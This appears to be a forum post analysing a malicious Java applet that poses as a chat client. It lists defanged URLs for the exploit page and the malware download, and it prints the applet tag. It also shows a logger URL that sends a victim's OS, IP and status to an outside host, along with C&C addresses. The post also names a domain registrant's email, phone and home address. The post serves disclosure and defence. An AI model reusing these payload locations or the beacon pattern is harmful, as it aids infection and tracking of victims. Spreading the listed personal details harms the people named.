The webpage with the exploit: hXXp://coinchat.freetzi.com/blank.html
<applet name='Coin Chat Client' width='900' height='450' code='wFidEABfB.class' archive='wFidEABfB.jar'></applet>
The .jar contains:
The malware: hXXp://fuskbugg.se/dl/f1adsy/smss2.exe (
virustotal)
(I have sent the file to a lot of A/V vendors, so hopefully the detection rate will soon be better)
And badly obfuscated "logger":
hXXp://galaxyjdb.com/insert.php?&o= OS.name &u=thewinner1234&ip= IP &e= paramString
(could be some kind of pay-by-install ?)
paramString can be "Noa", "Noc", "Yes", "Nod"
(also "http" has been changed to "hXXp", just in case. NEVER click ANY of these links, unless you know what you're doing).
EDIT1:
The malware C&C server = service2012.no-ip.biz = 63.141.253.124 (port 91)
coinchat.freetzi.com = 69.162.82.249
fuskbugg.se = 88.80.2.12
galaxyjdb.com = 109.163.233.106
galaxyjdb.com is owned by:
Quick Ware
Alex B (sblfc1234@gmail.com)
+44.7543642587
Fax: +1.5555555555
8 does it matter road
Liverpool, merseyside l17 7ja
GB
EDIT2:
The .jar exploit contain:
k{ol~puuly89:
Coded By Orpheu
The Responsibility in the use of this is on the user not the coder
(Orpheu's skype = izroda6)
And the C&C server is most likely made using this tutorial:
http://www.hackforums.net/showthread.php?tid=145184